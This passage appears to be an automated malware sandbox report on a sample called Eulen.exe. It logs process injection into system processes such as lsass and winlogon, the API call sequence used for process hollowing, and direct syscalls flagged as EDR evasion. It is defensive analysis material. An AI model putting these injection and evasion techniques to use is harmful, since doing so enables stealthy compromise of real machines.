Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2480FAC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2671A930000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C588F90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A8857C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 174DEDC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 282A2110000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DA09D90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 287FBEC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 2537C620000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29B59750000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20CAB590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BBF95A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D49EEE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 8790000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23014DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21744F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F02ED50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19985DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 23C03DC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C09C9C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 247BA250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 276A09D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D1D4C70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 17E6C720000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D2B1A80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 238A5DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 23606140000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\powercfg.exe base: 26FCFC60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\powercfg.exe base: 1E7F15B0000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647341DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

14_2_00007FF647341DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 91722908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 709A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: B1592908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AFB82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7C382908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 82762908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6AD42908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3CA2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73D32908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 21B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B9FD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 54D82908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 57DA2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe EIP: E3EE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 33B42908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 74532908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 15742908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C8542908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 212A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6D542908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D8952908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4332908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8E72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 19362908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 31802908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DD9B2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA1C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D52908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D2562908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5192908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D1A02908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B0C12908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E5A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC6C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FAC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1A932908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 88F92908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 857C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DEDC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A2112908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9D92908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FBEC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7C622908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 59752908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB592908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F95A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9EEE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2B2E2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC6E2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8792908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 14DD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 44F72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2ED52908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E6AF2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84C22908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A0712908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4DDB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F4C92908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A5112908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ACF2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 85DA2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7CDE2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 94182908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 54372908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CF1D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9C9C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BA252908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A09D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe EIP: E3F52908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 42A42908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D4C72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A5DD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 6142908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CFC62908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F15B2908	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Eulen.exe	NtQuerySystemInformation: Direct from: 0x7FF6DE66798E	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtOpenFile: Direct from: 0x7FF6E356A03E	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtMapViewOfSection: Direct from: 0x7FF6E4D93C54	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E3564720	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E2A7BA1F	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtMapViewOfSection: Direct from: 0x7FF60B9A34DF
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E355976B	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E330DD2A	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E4DA4205	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtClose: Direct from: 0x7FF6E2A79447
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B9C48B8
Source: C:\Users\user\Desktop\Eulen.exe	NtQuerySystemInformation: Direct from: 0x7FF6E4DA43BE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtQuerySystemInformation: Direct from: 0x7FF60BC109D7
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtQuerySystemInformation: Direct from: 0x7FF60B994E41
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E4DBB206	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtUnmapViewOfSection: Direct from: 0x7FF6E4D72A0C	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E2A9A866	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E4DCACC3	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E4DA098C	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B14322A
Source: C:\Users\user\Desktop\Eulen.exe	NtQuerySystemInformation: Direct from: 0x7FF6E32B0ECB	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtQuerySystemInformation: Direct from: 0x7FF6E3302A6F	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B9C31DA
Source: C:\Users\user\Desktop\Eulen.exe	NtQuerySystemInformation: Direct from: 0x7FF6E2A8D0D7	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60D4A58DC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtQuerySystemInformation: Direct from: 0x7FF60B99A4E6
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Indirect: 0x7FF6E2A4E235	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E32F1046	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B14BA1F
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B16A866
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF606D3798E
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60B9B6DA1
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E2A79440	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtClose: Direct from: 0x7FF60D46679B
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E4D76EFC	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtQuerySystemInformation: Direct from: 0x7FF60B9C7AEC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60D47098C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Indirect: 0x7FF60B11E235
Source: C:\Users\user\Desktop\Eulen.exe	NtProtectVirtualMemory: Direct from: 0x7FF6E355DA1E	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtUnmapViewOfSection: Direct from: 0x7FF60B9C436A
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	NtProtectVirtualMemory: Direct from: 0x7FF60D49ACC3

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22382760000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0C10000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E5A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8790000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A	Jump to behavior
